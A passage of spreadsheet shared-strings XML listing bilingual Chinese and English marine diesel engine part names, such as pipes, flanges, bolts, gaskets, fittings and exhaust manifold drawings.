  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口销</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>本体安全装置</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴止动器</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油位计</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位螺栓</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器驱动机构</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器升压器</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接轴</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Parallel key</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>8×7×25</t>
    </r>
  </si>
  <si>
    <r>
      <t>Parallel key</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>10×8×45</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法板安装布置图</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装座板</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气系统图</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Copper pipe φ20/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>ｔ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1.5</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜管</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Copper pipe φ15/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>ｔ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1.5</t>
    </r>
  </si>
  <si>
    <r>
      <t>Copper pipe φ10/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>ｔ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1.2</t>
    </r>
  </si>
  <si>
    <r>
      <t>Copper pipe φ6/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>ｔ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1.0</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卡套式管接头</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球阀</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>汽缸油驱动机构装配</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型钢</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铣齿</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Oil seal </t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油封</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条导轨支架</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链张紧器调整说明</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Special thread end taper pin</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特者螺纹锥销</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Charging unit welding drawing of MET37MB</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气管焊接图</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Plate t40</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Support 76.3x4.2</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接块</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>托架</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>90°Elbow(L) 250A GS</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯头</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Pipe φ267.4 X 6.6 X 161</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Pipe φ114.3 X 4.5 X 988</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Pipe φ34 X 3.2 X 842</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Pipe φ34 X 3.2 X 114</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Pipe φ34 X 3.2 X 140</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Flange 5K-250A</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Step </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>□</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>16</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉手</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Flange t40</t>
  </si>
  <si>
    <t>Connecting piece φ45 X 53.4</t>
  </si>
  <si>
    <t>Boss B-type M20 X 1.5 X 40L</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Plate 65×100×t12</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Angle steel L75 X 75 X 9 - 120L</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角钢</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Flange t22</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Plate t20</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Specifivations/instructions</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Material and test specification valve seat</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座材料及测试规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Arrangment of exhaust pipe (MET37MB)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管布置</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t>Exhaust manifold assembly parts 1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气集管装配图</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Washer 26</t>
  </si>
  <si>
    <t>Grid 605x7</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格栅</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Plate t1.5</t>
  </si>
  <si>
    <t>Gasket 295x1.5</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Blind flange PN5-350</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Screw heat resistant</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>耐热型六角螺栓</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Hexagon head screw M12x40</t>
  </si>
  <si>
    <t>Hexagon head bolt M16x85</t>
  </si>
  <si>
    <t>Hexagon head bolt M16x100</t>
  </si>
  <si>
    <t>Hexagon nut M22</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺母</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Washer 13</t>
  </si>
  <si>
    <r>
      <t>Exhaust manifold welding drawing 1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气集管焊接图</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Bottom 700x6</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Diffusor t6</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩压器</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Pipe t6</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Welding flange PN5-350x355,6</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Pad 50x50x110</t>
  </si>
  <si>
    <t>Angle steel 80x80x278</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角钢</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Cutting plan 1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢板下料图</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Screw heat resistant M12x40</t>
  </si>
  <si>
    <t>Screw heat resistant M12x70</t>
  </si>
  <si>
    <t>Hexagon head bolt M20 x 100</t>
  </si>
  <si>
    <t>Hexagon head screw M16 x 55</t>
  </si>
  <si>
    <t>Spring dowel pin 10 x 40</t>
  </si>
  <si>
    <t>Taper pin 10 x 50</t>
  </si>
  <si>
    <t>Disengaging fork welding drawing</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机啮合叉焊接图</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Plate 240x155x12</t>
  </si>
  <si>
    <t>Plate 60x50x7</t>
  </si>
  <si>
    <t>Conical spring washer 21x37</t>
  </si>
  <si>
    <t>喷油器</t>
  </si>
  <si>
    <t>喷油器</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>喷油器 备件</t>
  </si>
  <si>
    <t>喷油器组装工具</t>
  </si>
  <si>
    <t>燃油喷油器门-拆装</t>
  </si>
  <si>
    <t>燃油喷油器门-检查</t>
  </si>
  <si>
    <t>燃油喷油器门重装</t>
  </si>
  <si>
    <t>燃油喷油器门组装</t>
  </si>
  <si>
    <t>燃油喷油器座表面研磨</t>
  </si>
  <si>
    <t>3/2 way pilot air valve unit</t>
  </si>
  <si>
    <t>5K blind flange</t>
  </si>
  <si>
    <t>90°Elbow(S) 65A GS</t>
  </si>
  <si>
    <t xml:space="preserve">90°steel pipe butt-welding fitting 40A </t>
  </si>
  <si>
    <t>Angle L40×40×5×100</t>
  </si>
  <si>
    <t>Angle L40×40×5×58</t>
  </si>
  <si>
    <t>Angle L50×50×6×150</t>
  </si>
  <si>
    <t>Angle L50×50×6×160</t>
  </si>
  <si>
    <t>Angle L65×65×6×190</t>
  </si>
  <si>
    <t>Bite type fitting</t>
  </si>
  <si>
    <t>Bite type fitting (for steel pipe use)LLM-UR1/8×1/8</t>
  </si>
  <si>
    <t>Bite type fitting LLM-EP-1/2×1/2</t>
  </si>
  <si>
    <t>Bite type fitting LLM-T-1/2</t>
  </si>
  <si>
    <t>Bite type fitting LLM-U-1/2</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UM1/2×M27×2</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UM-1/4×M14×1.5</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UP-1/2×1/2</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UP-1/2×3/4</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UP-3/8x3/8</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UPP-1/4×1/2</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UR-1/4×1/4</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UR-3/8x3/8</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UR-6x1/8</t>
  </si>
  <si>
    <t>Bite type fitting LLM-US-1/4×1/2</t>
  </si>
  <si>
    <t>Bite type fittings LLM-U-3/8</t>
  </si>
  <si>
    <t>Bite type pipe fitt LLM T-15</t>
  </si>
  <si>
    <t>Bite type pipe fitt LLM TS-15×15×6</t>
  </si>
  <si>
    <t>Bite type pipe fitt LLM U-15</t>
  </si>
  <si>
    <t>Bite type pipe fitt LLM U-6</t>
  </si>
  <si>
    <t>Bite type pipe fitt LLM UP-6x1/8</t>
  </si>
  <si>
    <t>Bite type pipe fitt LLM UR-6x1/4</t>
  </si>
  <si>
    <t>Bolt M12x35</t>
  </si>
  <si>
    <t>Bolt M12x45</t>
  </si>
  <si>
    <t>Bolt M16x45</t>
  </si>
  <si>
    <t>Bolt M16x60</t>
  </si>
  <si>
    <t>Bolt M8x20</t>
  </si>
  <si>
    <t>Boss 40A×65A</t>
  </si>
  <si>
    <t>Boss G1/8</t>
  </si>
  <si>
    <t>Connecting pipe of control system</t>
  </si>
  <si>
    <t>Connecting pipe starting air con valve</t>
  </si>
  <si>
    <t>Connecting pipe starting air con. valve</t>
  </si>
  <si>
    <t>Copper gasket 10×14×1</t>
  </si>
  <si>
    <t>Copper gasket 14.5x19.5x1</t>
  </si>
  <si>
    <t>Copper gasket 14x18x1</t>
  </si>
  <si>
    <t>Copper gasket 25×34×1</t>
  </si>
  <si>
    <t>Copper gasket 28x37.5x1</t>
  </si>
  <si>
    <t>Copper gasket 34x43.5x1</t>
  </si>
  <si>
    <t>Copper gasket 42x55x1</t>
  </si>
  <si>
    <t>Copper gasket 48x58x1</t>
  </si>
  <si>
    <t>Cross recessed pan head screw M6x10</t>
  </si>
  <si>
    <t>Drain main pipe of exh. valve or driving oil</t>
  </si>
  <si>
    <t>Drain separator assembly</t>
  </si>
  <si>
    <t>Elbow fitt. 40K-6A</t>
  </si>
  <si>
    <t>Flange 30K-20A-15A</t>
  </si>
  <si>
    <t>Full face gasket 5K-65</t>
  </si>
  <si>
    <t>Gasket with inner &amp; outer ring 30K-20</t>
  </si>
  <si>
    <t>Hex. socket head bolt M10×130</t>
  </si>
  <si>
    <t>Hex. socket head bolt M10×75</t>
  </si>
  <si>
    <t>Hexagon head bolt M10×25</t>
  </si>
  <si>
    <t>Hexagon head bolt M10×30</t>
  </si>
  <si>
    <t>Hexagon head bolt M12×25</t>
  </si>
  <si>
    <t>Hexagon head bolt M12×30</t>
  </si>
  <si>
    <t>Hexagon head bolt M12×35</t>
  </si>
  <si>
    <t>Hexagon head bolt M12×45</t>
  </si>
  <si>
    <t>Hexagon head bolt M12×50</t>
  </si>
  <si>
    <t>Hexagon head bolt M12x25</t>
  </si>
  <si>
    <t>Hexagon head bolt M12x35</t>
  </si>
  <si>
    <t>Hexagon head bolt M12X40</t>
  </si>
  <si>
    <t>Hexagon head bolt M16x45</t>
  </si>
  <si>
    <t>Hexagon head bolt M16x60</t>
  </si>
  <si>
    <t>Hexagon head bolt M8x15</t>
  </si>
  <si>
    <t>Hexagon head bolt M8x20</t>
  </si>
  <si>
    <t>Hydraulic pipe for exhaust valve</t>
  </si>
  <si>
    <t>L40x40x5x105.6</t>
  </si>
  <si>
    <t>L40x40x5x158</t>
  </si>
  <si>
    <t>L40x40x5x195</t>
  </si>
  <si>
    <t>L40x40x5x230</t>
  </si>
  <si>
    <t>L50×50×6×145L</t>
  </si>
  <si>
    <t>L50×50×6×220L</t>
  </si>
  <si>
    <t>L50x50x6x101L</t>
  </si>
  <si>
    <t>L50x50x6x146</t>
  </si>
  <si>
    <t>L50x50x6x153.5</t>
  </si>
  <si>
    <t>L50x50x6x200</t>
  </si>
  <si>
    <t>L50x50x6x205</t>
  </si>
  <si>
    <t>绝缘层</t>
  </si>
  <si>
    <t>Lock type needle valve</t>
  </si>
  <si>
    <t>Lubricating main pipe of fuel oil pump</t>
  </si>
  <si>
    <t>Material Standard List for Classification Survey</t>
  </si>
  <si>
    <t>One way rectangular joint 15A</t>
  </si>
  <si>
    <t>One way rectangular joint 20A</t>
  </si>
  <si>
    <t>One way rectangular joint set bolt 15A</t>
  </si>
  <si>
    <t>One way rectangular joint set bolt 20A</t>
  </si>
  <si>
    <t>Pipe 10A×Sch40×346.3</t>
  </si>
  <si>
    <t>Pipe 10A×Sch40×456.8</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x1227.4</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x1541.7mm</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x1962.7mm</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x2030.8mm</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x2034.1mm</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x2148.4mm</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x2177.9mm</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x2253.3mm</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x2363.5mm</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x2833.7mm</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x3071mm</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x3723.4mm</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x416mm</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x431mm</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x4380.6mm</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x441mm</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x5.5m</t>
  </si>
  <si>
    <t>Pipe 20A×Sch80×1697.2</t>
  </si>
  <si>
    <t>Pipe 20A×Sch80×633.5</t>
  </si>
  <si>
    <t>Pipe 20A×Sch80×928.5</t>
  </si>
  <si>
    <t>Pipe 20AxSch40x1119.5mm</t>
  </si>
  <si>
    <t>Pipe 20AxSch40x3841.7mm</t>
  </si>
  <si>
    <t>Pipe 32A×95L</t>
  </si>
  <si>
    <t>Pipe 32Ax2264.3L</t>
  </si>
  <si>
    <t>Pipe 32Ax377L</t>
  </si>
  <si>
    <t>Pipe 40A×249.9L</t>
  </si>
  <si>
    <t>Pipe 50A×1386.1</t>
  </si>
  <si>
    <t>Pipe 65A×100.5</t>
  </si>
  <si>
    <t>Pipe 65A×113.5</t>
  </si>
  <si>
    <t>Pipe 65A×182.5</t>
  </si>
  <si>
    <t>Pipe 65A×210.5</t>
  </si>
  <si>
    <t>Pipe 65A×3588L</t>
  </si>
  <si>
    <t>Pipe 6A×198L</t>
  </si>
  <si>
    <t>Pipe 6A×410.4L</t>
  </si>
  <si>
    <t>Pipe 8AxSch40x5.5m</t>
  </si>
  <si>
    <t>Pipe arrangement lub.pipe of governor driving gear</t>
  </si>
  <si>
    <t>Pipe arrangement of T/C cooling air piping</t>
  </si>
  <si>
    <t>Pipe end welding boss M24×2</t>
  </si>
  <si>
    <t>Pipe maufacturing procedure</t>
  </si>
  <si>
    <t>Pipe support (B type) 22x1</t>
  </si>
  <si>
    <t>Pipe support (B type) 22x2</t>
  </si>
  <si>
    <t>Pipe support (B type) 22x3</t>
  </si>
  <si>
    <t>Pipe support (B type) 22x4</t>
  </si>
  <si>
    <t>Pipe support (B type) 22x5</t>
  </si>
  <si>
    <t>Pipe support (B type) 22x6</t>
  </si>
  <si>
    <t>Pipe support (B type) 28x1</t>
  </si>
  <si>
    <t>Pipe support 22x7</t>
  </si>
  <si>
    <t>Pipe φ6x1x740.8</t>
  </si>
  <si>
    <t>Plain washer M8</t>
  </si>
  <si>
    <t>Plate 38xt9x100</t>
  </si>
  <si>
    <t>Plate 65xt9x100</t>
  </si>
  <si>
    <t>Plate 90×60xt9</t>
  </si>
  <si>
    <t>Reducing valve unit</t>
  </si>
  <si>
    <t>Screwed cock 16K-6A B-C</t>
  </si>
  <si>
    <t>Special flange 5K-32A</t>
  </si>
  <si>
    <t>Special flange 5K-32A-40A</t>
  </si>
  <si>
    <t>Special full face gasket 10K-40</t>
  </si>
  <si>
    <t>Steel pipe socket welding flange 5K-32</t>
  </si>
  <si>
    <t>Steel pipe socket welding flange 5K-65</t>
  </si>
  <si>
    <t>Tube supporter A 6x1</t>
  </si>
  <si>
    <t>U bolt 65A</t>
  </si>
  <si>
    <t>U-bolt 150A</t>
  </si>
  <si>
    <t>二位三通导阀</t>
  </si>
  <si>
    <t xml:space="preserve">30K-Socket welding type flange </t>
  </si>
  <si>
    <t>45°Elbow(L) 25A GS</t>
  </si>
  <si>
    <t>90°Elbow(S) 40A</t>
  </si>
  <si>
    <t>90°Elbow(S) 50A GS</t>
  </si>
  <si>
    <t>Air vent pipe arrangement of inlet main pipe of exh. valve driving oil</t>
  </si>
  <si>
